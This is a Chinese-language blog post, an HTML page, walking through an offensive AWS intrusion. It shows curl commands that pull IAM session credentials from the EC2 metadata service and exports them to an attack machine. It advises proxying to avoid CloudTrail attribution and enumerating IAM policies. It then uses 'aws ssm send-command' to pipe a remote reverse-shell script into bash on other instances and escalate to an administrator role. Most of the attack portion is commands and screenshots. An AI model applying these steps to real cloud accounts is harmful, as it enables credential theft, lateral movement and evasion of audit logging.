<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>一次典型的AWS渗透 | ShadowMccc&#39;s Blog</title>
  <meta name="author" content="ShadowMccc">
  
  <meta name="description" content="metadata（Cloud SSRF，在启用了metadataV1版本的情况下）首先通过某种方式控制了一台EC2机器，通过获取metadata发现该机器绑定了IAM角色，通过metadata获取session token
查看是否绑定了IAM角色1curl http://169.254.169.2">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="一次典型的AWS渗透"/>
  <meta property="og:site_name" content="ShadowMccc&#39;s Blog"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="ShadowMccc&#39;s Blog" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>






<meta name="generator" content="Hexo 7.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">ShadowMccc&#39;s Blog</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> 一次典型的AWS渗透</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <h1><span id="metadatacloud-ssrf在启用了metadatav1版本的情况下">metadata（Cloud SSRF，在启用了metadataV1版本的情况下）</span></h1><p>首先通过某种方式控制了一台EC2机器，通过获取metadata发现该机器绑定了IAM角色，通过metadata获取session token</p>
<h2><span id="查看是否绑定了iam角色">查看是否绑定了IAM角色</span></h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://169.254.169.254/latest/meta-data</span><br></pre></td></tr></table></figure>

<p><img src="/images/110.png" alt="110"></p>
<h2><span id="查看iam的信息">查看IAM的信息</span></h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://169.254.169.254/latest/meta-data/iam/info</span><br></pre></td></tr></table></figure>

<p><img src="/images/111.png" alt="111"></p>
<h2><span id="获取session-token">获取session token</span></h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://169.254.169.254/latest/meta-data/iam/security-credentials/角色</span><br></pre></td></tr></table></figure>

<p><img src="/images/112.png" alt="112"></p>
<p>注意：你喜欢的话也可以直接在目标机器上操作，但是我喜欢用pacu，所以喜欢把session token弄下来</p>
<h2><span id="在攻击机器上使用该session-token不建议用kali">在攻击机器上使用该session token（不建议用kali）</span></h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> AWS_ACCESS_KEY_ID=<span class="string">&quot;ASIA...EXAMPLE&quot;</span></span><br><span class="line"><span class="built_in">export</span> AWS_SECRET_ACCESS_KEY=<span class="string">&quot;wJalr...EXAMPLE&quot;</span></span><br><span class="line"><span class="built_in">export</span> AWS_SESSION_TOKEN=<span class="string">&quot;FwoGZXIvYXNz...EXAMPLE&quot;</span></span><br></pre></td></tr></table></figure>

<p>注意：API调用都会记录到<strong>CloudTrail</strong>中，其中就包含了你使用的access key，IP，所以还是尽量走代理</p>
<h1><span id="角色的策略">角色的策略</span></h1><h2><span id="查看当前角色的策略不一定有权限可以试一下">查看当前角色的策略（不一定有权限，可以试一下）</span></h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws iam list-attached-role-policies --role-name 角色名</span><br></pre></td></tr></table></figure>

<p><img src="/images/113.png" alt="113"></p>
<p>还可以使用pacu进行权限的爆破枚举</p>
<h1><span id="ssm-提权">SSM 提权</span></h1><p>从上面可以看到当前的角色并没有列出角色策略的权限，但是我们可以盲试一手ssm，跟盲试s3一样，很多可能都有权限</p>
<h2><span id="尝试列出使用了ssm-agent的机器">尝试列出使用了SSM Agent的机器</span></h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws ssm describe-instance-information --output table</span><br></pre></td></tr></table></figure>

<p><img src="/images/114.png" alt="114"></p>
<h2><span id="尝试列出ec2绑定的iam角色">尝试列出EC2绑定的IAM角色</span></h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws ec2 describe-instances --region bbb --query <span class="string">&#x27;Reservations[].Instances[].[InstanceId, IamInstanceProfile.Arn]&#x27;</span> --output table</span><br></pre></td></tr></table></figure>

<p><img src="/images/115.png" alt="115"></p>
<h2><span id="尝试通过ssm反弹shell">尝试通过SSM反弹shell</span></h2><p>找到你想要的哪个角色的机器，尝试反弹shell（会有日志和命令记录）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws ssm send-command --instance-ids <span class="string">&quot;i-123123123&quot;</span> --document-name <span class="string">&quot;AWS-RunShellScript&quot;</span> --output text --parameters commands=<span class="string">&quot;curl https://reverse-shell.sh/127.0.0.1:4444 | bash&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/116.png" alt="116"></p>
<h2><span id="使用新的ec2的session-token查看角色的策略">使用新的ec2的session token查看角色的策略</span></h2><p>经过几次尝试后，发现了一个机器的角色有列出策略的权限，查看之前的角色的策略</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws iam list-attached-role-policies --role-name aaa</span><br></pre></td></tr></table></figure>

<p><img src="/images/117.png" alt="117"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName</span><br></pre></td></tr></table></figure>

<p><img src="/images/118.png" alt="118"></p>
<p>经过几次尝试后，发现了一个EC2绑定了管理员策略的角色</p>
<p><img src="/images/119.png" alt="119"></p>
<p>接下来就是重复之前的操作进行提权，不想写了，权限维持什么的去cloud.hacktricks.xyz上看吧</p>

	  <div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.</a>
</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a type="button" class="btn btn-default disabled"><i class="fa fa-arrow-circle-o-left"></i>Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/12/25/o365 & Azure-GoldenSAML/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2025-03-08 
	</div>
	

	<!-- categories -->
    

	<!-- tags -->
		

	<!-- toc -->
	<div class="meta-widget">
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2025 ShadowMccc's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



</body>
   </html>
